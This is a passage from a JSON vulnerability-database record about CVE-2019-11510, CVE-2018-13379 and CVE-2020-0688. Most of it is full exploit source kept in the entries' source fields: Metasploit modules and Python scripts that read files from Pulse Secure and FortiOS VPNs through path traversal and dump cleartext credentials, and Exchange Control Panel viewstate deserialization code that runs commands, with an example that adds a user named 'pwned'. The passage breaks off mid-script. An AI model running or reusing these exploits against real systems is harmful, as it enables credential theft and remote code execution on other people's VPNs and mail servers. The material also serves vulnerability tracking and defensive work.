"AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-13379", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Key Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0688", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-08-22T05:38:44", "description": "", "cvss3": {}, "published": "2019-08-21T00:00:00", "type": "packetstorm", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", "href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. \nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-08-20T21:46:13", "description": "", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "packetstorm", "title": "FortiOS 5.6.7 / 6.0.4 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "PACKETSTORM:154147", "href": "https://packetstormsecurity.com/files/154147/FortiOS-5.6.7-6.0.4-Credential-Disclosure.html", "sourceData": "`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.fortinet.com/ \n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n# Tested on: 5.6.6 \n# CVE : CVE-2018-13379 \n \n# Exploit SSLVPN Fortinet - FortiOs \n#!/usr/bin/env python \nimport requests, sys, time \nimport urllib3 \nurllib3.disable_warnings() \n \n \ndef leak(host, port): \nprint(\"[!] Leak information...\") \ntry: \nurl = \"https://\"+host+\":\"+port+\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\" \nheaders = {\"User-Agent\": \"Mozilla/5.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"} \nr=requests.get(url, headers=headers, verify=False, stream=True) \nimg=r.raw.read() \nif \"var fgt_lang =\" in str(img): \nwith open(\"sslvpn_websession_\"+host+\".dat\", 'w') as f: \nf.write(img) \nprint(\"[>] Save to file ....\") \nparse(host) \nprint(\"\\n\") \nreturn True \nelse: \nreturn False \nexcept requests.exceptions.ConnectionError: \nreturn False \ndef is_character_printable(s): \nreturn all((ord(c) < 127) and (ord(c) >= 32) for c in s) \n \ndef is_printable(byte): \nif is_character_printable(byte): \nreturn byte \nelse: \nreturn '.' \n \ndef read_bytes(host, chunksize=8192): \nprint(\"[>] Read bytes from > \" + \"sslvpn_websession\"+host+\".dat\") \nwith open(\"sslvpn_websession_\"+host+\".dat\", \"rb\") as f: \nwhile True: \nchunk = f.read(chunksize) \nif chunk: \nfor b in chunk: \nyield b \nelse: \nbreak \ndef parse(host): \nprint(\"[!] Parsing Information...\") \nmemory_address = 0 \nascii_string = \"\" \nfor byte in read_bytes(host): \nascii_string = ascii_string + is_printable(byte) \nif memory_address%61 == 60: \nif ascii_string!=\".............................................................\": \nprint ascii_string \nascii_string = \"\" \nmemory_address = memory_address + 1 \n \ndef check(host, port): \nprint(\"[!] Check vuln...\") \nuri = \"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\" \ntry: \nr = requests.get(\"https://\" + host + \":\" + port + uri, verify=False) \nif(r.status_code == 200): \nreturn True \nelif(r.status_code == 404): \nreturn False \nelse: \nreturn False \nexcept: \nreturn False \ndef main(host, port): \nprint(\"[+] Start exploiting....\") \nvuln = check(host, port) \nif(vuln): \nprint(\"[+] Target is vulnerable!\") \nbin_file = leak(host, port) \nelse: \nprint(\"[X] Target not vulnerable.\") \n \nif __name__ == \"__main__\": \n \nif(len(sys.argv) < 3): \nprint(\"Use: python {} ip/dns port\".format(sys.argv[0])) \nelse: \nhost = sys.argv[1] \nport = sys.argv[2] \nmain(host, port) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154147/fortios-disclose.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-20T21:46:14", "description": "", "cvss3": {}, "published": "2019-08-19T00:00:00", "type": "packetstorm", "title": "FortiOS 5.6.7 / 6.0.4 Credential Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "PACKETSTORM:154146", "href": "https://packetstormsecurity.com/files/154146/FortiOS-5.6.7-6.0.4-Credential-Disclosure.html", "sourceData": "`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. \n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\" \n# Date: 17/08/2019 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.fortinet.com/ \n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html \n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n# Tested on: 5.6.6 \n# CVE : CVE-2018-13379 \n \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SSL VPN FortiOs - System file leak', \n'Description' => %q{ \nFortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. \nThis exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text). \nThis vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ] \n], \n'Author' => [ 'lynx (Carlos Vieira)' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'}) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing binary file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ow crap, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/154146/fortios-disclose.rb.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-03-05T07:12:27", "description": "", "cvss3": {}, "published": "2020-03-04T00:00:00", "type": "packetstorm", "title": "Exchange Control Panel Viewstate Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-04T00:00:00", "id": "PACKETSTORM:156620", "href": "https://packetstormsecurity.com/files/156620/Exchange-Control-Panel-Viewstate-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'bindata' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# include Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nDEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27' \nVALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\" \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exchange Control Panel Viewstate Deserialization', \n'Description' => %q{ \nThis module exploits a .NET serialization vulnerability in the \nExchange Control Panel (ECP) web page. The vulnerability is due to \nMicrosoft Exchange Server not randomizing the keys on a \nper-installation basis resulting in them using the same validationKey \nand decryptionKey values. With knowledge of these, values an attacker \ncan craft a special viewstate to cause an OS command to be executed \nby NT_AUTHORITY\\SYSTEM using .NET deserialization. \n}, \n'Author' => 'Spencer McIntyre', \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0688'], \n['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'], \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows (x86)', { 'Arch' => ARCH_X86 } ], \n[ 'Windows (x64)', { 'Arch' => ARCH_X64 } ], \n[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 1, \n'DisclosureDate' => '2020-02-11', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n} \n)) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \n]) \nend \n \ndef check \nstate = get_request_setup \nviewstate = state[:viewstate] \nreturn CheckCode::Unknown if viewstate.nil? \n \nviewstate = Rex::Text.decode_base64(viewstate) \nbody = viewstate[0...-20] \nsignature = viewstate[-20..-1] \n \nunless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature \nreturn CheckCode::Safe \nend \n \n# we've validated the signature matches based on the data we have and thus \n# proven that we are capable of signing a viewstate ourselves \nCheckCode::Vulnerable \nend \n \ndef generate_viewstate(generator, session_id, cmd) \nviewstate = ::Msf::Util::DotNetDeserialization.generate(cmd) \nsignature = generate_viewstate_signature(generator, session_id, viewstate) \nRex::Text.encode_base64(viewstate + signature) \nend \n \ndef generate_viewstate_signature(generator, session_id, viewstate) \nmac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>') \nmac_key_bytes << Rex::Text.to_unicode(session_id) \nOpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes) \nend \n \ndef exploit \nstate = get_request_setup \n \n# the major limit is the max length of a GET request, the command will be \n# XML escaped and then base64 encoded which both increase the size \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded, opts={state: state}) \nelse \ncmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first \nexecute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state}) \nend \nend \n \ndef execute_command(cmd, opts) \nstate = opts[:state] \nviewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd) \n5.times do |iteration| \n# this request *must* be a GET request, can't use POST to use a larger viewstate \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => state[:cookies].join(''), \n'agent' => state[:user_agent], \n'vars_get' => { \n'__VIEWSTATE' => viewstate, \n'__VIEWSTATEGENERATOR' => state[:viewstate_generator] \n} \n}) \nbreak \nrescue Rex::ConnectionError, Errno::ECONNRESET => e \nvprint_warning('Encountered a connection error while sending the command, sleeping before retrying') \nsleep iteration \nend \nend \n \ndef get_request_setup \n# need to use a newer default user-agent than what Metasploit currently provides \n# see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string \nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43' \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'), \n'method' => 'POST', \n'agent' => user_agent, \n'vars_post' => { \n'password' => datastore['PASSWORD'], \n'flags' => '4', \n'destination' => full_uri(normalize_uri(target_uri.path, 'owa')), \n'username' => datastore['USERNAME'] \n} \n}) \nfail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil? \ncookies = [res.get_cookies] \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => res.get_cookies, \n'agent' => user_agent \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200 \ncookies << res.get_cookies \n \nviewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0] \nif viewstate_generator.nil? \nprint_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\") \nviewstate_generator = DEFAULT_VIEWSTATE_GENERATOR \nelse \nvprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\") \nend \n \nviewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0] \nif viewstate.nil? \nvprint_warning('Failed to find the __VIEWSTATE value') \nend \n \nsession_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \nif session_id.nil? \nfail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies') \nend \nvprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\") \n \n{user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id} \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156620/exchange_ecp_viewstate.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-04T15:06:30", "description": "", "cvss3": {}, "published": "2020-03-02T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 15.2.221.12 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "PACKETSTORM:156592", "href": "https://packetstormsecurity.com/files/156592/Microsoft-Exchange-2019-15.2.221.12-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution \n# Date: 2020-02-28 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 \n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys \n# Vendor Homepage: https://www.microsoft.com \n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4 \n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019 \n# CVE: CVE-2020-0688 \n \n#! /usr/bin/env python \n# -*- coding: utf-8 -*- \n''' \n \n \nCopyright 2020 Photubias(c) \n \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2020-0688-Photubias.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nThis is a native implementation without requirements, written in Python 2. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \nReverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net \n \nExample Output: \nCVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\" \n[+] Login worked \n[+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570 \n[+] Detected OWA version number 15.2.221.12 \n[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable! \n[+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]: \n[+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g== \nSending now ... \n''' \nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass \n \n## STATIC STRINGS \n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations) \nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=') \n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability) \nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF') \n \ndef convertInt(iInput, length): \nreturn struct.pack(\"<I\" , int(iInput)).encode('hex')[:length] \n \ndef getYsoserialPayload(sCommand, sSessionId): \n## PART1 of the payload to hash \nstrPart1 = strSerTemplate.replace('###payload###', sCommand) \n## Fix the length fields \n#print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand)) \n#print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand)) \nstrLength1 = convertInt(0x06b8 + len(sCommand),4) \nstrLength2 = convertInt(0x04da + len(sCommand),4) \nstrPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:] \nstrPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:] \n \n## PART2 of the payload to hash \nstrPart2 = '274e7bb9' \nfor v in sSessionId: strPart2 += binascii.hexlify(v)+'00' \nstrPart2 = binascii.unhexlify(strPart2) \n \nstrMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest() \nstrResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac)) \nreturn strResult \n \ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar): \nif not sTarget[-1:] == '/': sTarget += '/' \n## Verify Login \nlPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'} \ntry: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read() \nexcept: print('[!] Error, ' + sTarget + ' not reachable') \nbLoggedIn = False \nfor cookie in oCookjar: \nif cookie.name == 'cadata': bLoggedIn = True \nif not bLoggedIn: \nprint('[-] Login Wrong, too bad') \nexit(1) \nprint('[+] Login worked') \n \n## Verify Session ID \nsSessionId = '' \nsResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read() \nfor cookie in oCookjar: \nif 'SessionId' in cookie.name: sSessionId = cookie.value \nprint('[+] Got ASP.NET Session ID: ' + sSessionId) \n \n## Verify OWA Version \nsVersion = '' \ntry: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2] \nexcept: sVersion = 'favicon' \nif 'favicon' in sVersion: \nprint('[*] Problem, this user has never logged in before (wizard detected)') \nprint(' Please log in manually first at ' + sTarget + 'ecp/default.aspx') \nexit(1) \nprint('[+] Detected OWA version number '+sVersion) \n \n## Verify ViewStateValue \nsViewState = '' \ntry: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0] \nexcept: pass \nif sViewState == 'B97B4E27': \nprint('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!') \nelse: \nprint('[-] Error, viewstate wrong or not correctly parsed: '+sViewState) \nans = raw_input('[?] Still want to try the exploit? [y/N]: ') \nif ans == '' or ans.lower() == 'n': exit(1) \nreturn sSessionId, sTarget, sViewState \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='') \nparser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='') \nparser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='') \nparser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='') \nargs = parser.parse_args() \nif args.target == '' or args.username == '' or 